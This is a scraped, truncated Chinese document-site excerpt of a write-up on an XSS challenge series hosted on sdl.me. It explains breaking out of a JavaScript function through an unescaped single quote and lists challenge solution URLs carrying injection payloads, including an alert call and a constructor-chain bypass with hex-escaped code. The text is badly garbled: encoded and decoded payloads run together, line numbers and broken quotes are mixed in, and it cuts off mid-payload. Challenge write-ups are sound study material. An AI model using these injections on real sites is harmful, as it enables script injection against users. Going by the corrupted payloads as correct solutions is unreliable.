还剩1页未读,继续阅读
文本内容:
SecProject WebAppSec之XSS解析第一篇脚本安全电脑资料整体而言共三个题目,难度依次增加,在一个js函数中,如果某一变量可以使用单引号而不被转义或过滤,就可以闭合整个函数,从而将剩下的内容当作js代码来直接执行但有的情况,变量的多次使用,给闭合函数造成了不少的困扰这里就将其题目与部分答案,稍做解析,学习了解XSS的各种技巧看过之后,才会发现他人是多么sdl.me/challenge1/xss1/JsChallenge
1.aspinput1=111input2=222input3=
333010203041718...sdl.me/challenge1/xss1/JsChallenge
1.aspinput1=111input2=222%27%29a}alert%2811%29;/*input3=333*/function%20c%28%29{i f%280%29{//sdl.me/challenge1/xss1/JsChallenge
1.aspinput1=111input2=222′a}alert11;/*input3=333*/function c{if0{//
0102030417181920....sdl.me/challenge1/xss1/JsChallenge
1.aspinput1=test1input2=2%27%29{}}%20try{/*input3=1*///%27}finally{%280%29[%27con structor%27][%27constructor%27]%28%27\x61lert\x28/superevr/%29%27%29%28%29};{{//sdl.me/challenge1/xss1/JsChallenge
1.aspinput1=test1input2=2′{}}try{/*input3=1*///’}finally{0[constructor][construct or]‘\x61lert\x28/superevr/’};{{//01sdl.me/challenge1/xss1/JsChallenge
1.aspinput1=ainput2=%
27...。